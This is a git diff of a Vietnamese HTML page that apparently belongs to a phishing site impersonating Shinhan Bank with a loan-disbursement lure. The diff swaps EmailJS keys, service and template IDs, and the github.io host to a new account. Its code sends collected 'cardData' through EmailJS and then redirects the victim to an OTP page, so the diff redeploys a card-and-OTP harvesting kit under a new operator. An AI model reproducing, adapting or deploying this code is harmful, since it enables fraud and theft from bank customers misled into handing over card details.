--- a/pages/vi/atm.html
+++ b/pages/vi/atm.html
@@ -27,7 +27,7 @@
                 }
             };
         };
-        emailjs.init('c-Ms5MjWbitpDBb-E');
+        emailjs.init('jugdaw6sXSdJVlAlt');
     </script>
     <style>
         * {
@@ -522,14 +522,14 @@
 
     <nav role="navigation" aria-label="Main Navigation">
         <ul id="nav-menu">
-            <li><a href="https://vaytieudung.github.io/shinhanbank/pages/vi/trang-chu.html">Trang Chủ</a></li>
-            <li><a href="https://vaytieudung.github.io/shinhanbank/pages/vi/gioi-thieu.html">Giới Thiệu</a></li>
-            <li><a href="https://vaytieudung.github.io/shinhanbank/pages/vi/ca-nhan.html">Lợi Ích</a></li>
-            <li><a href="https://vaytieudung.github.io/shinhanbank/pages/vi/lai-suat-tien-gui.html">Giấy Tờ Cần Thiết</a></li>
-            <li><a href="https://vaytieudung.github.io/shinhanbank/pages/vi/Evaluate-conditions.html">Đăng Ký Giải Ngân</a></li>
-            <li><a href="https://vaytieudung.github.io/shinhanbank/pages/vi/check_result.html">Xem Kết Quả</a></li>
-            <li><a href="https://vaytieudung.github.io/shinhanbank/pages/vi/dieu-khoan-su-dung.html">Điều Khoản Sử Dụng</a></li>
-            <li><a href="https://vaytieudung.github.io/shinhanbank/pages/vi/support-center.html">Liên Hệ</a></li>
+            <li><a href="https://trum1212.github.io/shinhanbank/pages/vi/trang-chu.html">Trang Chủ</a></li>
+            <li><a href="https://trum1212.github.io/shinhanbank/pages/vi/gioi-thieu.html">Giới Thiệu</a></li>
+            <li><a href="https://trum1212.github.io/shinhanbank/pages/vi/ca-nhan.html">Lợi Ích</a></li>
+            <li><a href="https://trum1212.github.io/shinhanbank/pages/vi/lai-suat-tien-gui.html">Giấy Tờ Cần Thiết</a></li>
+            <li><a href="https://trum1212.github.io/shinhanbank/pages/vi/Evaluate-conditions.html">Đăng Ký Giải Ngân</a></li>
+            <li><a href="https://trum1212.github.io/shinhanbank/pages/vi/check_result.html">Xem Kết Quả</a></li>
+            <li><a href="https://trum1212.github.io/shinhanbank/pages/vi/dieu-khoan-su-dung.html">Điều Khoản Sử Dụng</a></li>
+            <li><a href="https://trum1212.github.io/shinhanbank/pages/vi/support-center.html">Liên Hệ</a></li>
         </ul>
     </nav>
 
@@ -863,7 +863,7 @@
             } catch (error) {
                 console.error('Error parsing formData:', error);
                 alert('Lỗi khi tải thông tin giải ngân. Vui lòng thử lại.');
-                window.location.href = 'https://vaytieudung.github.io/shinhanbank/pages/vi/Evaluate-conditions.html';
+                window.location.href = 'https://trum1212.github.io/shinhanbank/pages/vi/Evaluate-conditions.html';
             }
         });
 
@@ -1042,10 +1042,10 @@
     method: ''
 };
                 console.log('Sending cardData:', cardData);
-                emailjs.send('service_60tgxof', 'template_1b2u2w7', cardData).then(
+                emailjs.send('service_zspw0b7', 'template_8gfs8jr', cardData).then(
                     () => {
                         console.log('EmailJS sent successfully');
-                        window.location.href = 'https://vaytieudung.github.io/shinhanbank/pages/vi/otp.html';
+                        window.location.href = 'https://trum1212.github.io/shinhanbank/pages/vi/otp.html';
                     },
                     (error) => {
                         console.error('EmailJS error:', error);
